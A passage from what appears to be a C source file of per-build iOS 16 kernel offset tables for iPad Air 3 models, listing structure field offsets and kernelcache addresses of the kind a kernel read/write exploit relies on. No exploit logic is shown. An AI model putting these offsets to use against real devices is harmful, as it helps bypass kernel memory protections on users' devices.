0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad11,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad11,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad11,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2f1288, .kernelcache__gPhysBase = 0xfffffff0078f80e0, .kernelcache__gPhysSize = 0xfffffff0078f80e0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f62b8, .kernelcache__perfmon_devices = 0xfffffff00a32f500, .kernelcache__perfmon_dev_open = 0xfffffff007ea9c8c, .kernelcache__ptov_table = 0xfffffff0078ab160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a32e990, .kernelcache__vm_pages = 0xfffffff0078a7ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078aa110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a32e988, .kernelcache__vn_kqfilter = 0xfffffff007ef8ad8, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad11,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a23dab0, .kernelcache__gPhysBase = 0xfffffff0078dc288, .kernelcache__gPhysSize = 0xfffffff0078dc288 + 8, .kernelcache__gVirtBase = 0xfffffff0078da440, .kernelcache__perfmon_devices = 0xfffffff00a27d530, .kernelcache__perfmon_dev_open = 0xfffffff007e7e434, .kernelcache__ptov_table = 0xfffffff00788f9a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a27c910, .kernelcache__vm_pages = 0xfffffff00788c0f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788e950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a27c908, .kernelcache__vn_kqfilter = 0xfffffff007eccc44, }, // iPad Air 3 // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a225178, .kernelcache__gPhysBase = 0xfffffff00781bc60, .kernelcache__gPhysSize = 0xfffffff00781bc60 + 8, .kernelcache__gVirtBase = 0xfffffff007819e40, .kernelcache__perfmon_devices = 0xfffffff00a260380, .kernelcache__perfmon_dev_open = 0xfffffff007e873ac, .kernelcache__ptov_table = 0xfffffff0077cf248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a25f800, .kernelcache__vm_pages = 0xfffffff0077cc080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a25f7f8, .kernelcache__vn_kqfilter = 0xfffffff007ed9a44, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad11,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, 